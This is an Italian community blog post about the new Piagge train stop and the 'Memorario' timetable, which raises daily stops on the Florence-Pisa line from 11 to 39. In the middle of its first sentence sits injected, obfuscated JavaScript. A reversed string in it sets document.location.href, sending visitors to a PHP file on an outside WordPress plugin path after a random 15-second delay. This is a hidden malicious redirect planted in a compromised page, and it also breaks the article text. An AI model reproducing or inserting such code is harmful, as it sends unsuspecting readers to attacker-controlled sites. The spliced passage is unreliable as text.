In carrozza!

image_pdfimage_print

Dobbiamo confessare che all’inizio non davamo molto credito alla faccenda, e mentre la stazioncina ferroviaria delle Piagge era in costruzione immaginavamo che ci sarebbero voluti anni prima di vedere i treni fermarsi qui per davvero. Invece, in poco tempo sono iniziate le prime corse, ed ora già parecchie persone utilizzano quotidianamente il treno per (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andare a Firenze o nella direzione opposta, risparmiando tempo e inquinamento.
Ora arriva un’altra buona notizia, che riguarda anche le Piagge perché hanno la fortuna di trovarsi sulla linea Firenze-Pisa. Il 12 dicembre entra in vigore “Memorario”, il nuovo sistema con orari regolari, più facili da memorizzare; tra le altre cose, con Memorario aumenteranno le corse tra Firenze e Pisa, e i treni che ogni giorno si fermano alle Piagge passeranno dagli attuali 11 a 39.
Una bella differenza, che potrà convincere anche molti incerti ad usare il treno e risparmiarsi lo stress del traffico e del parcheggio.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *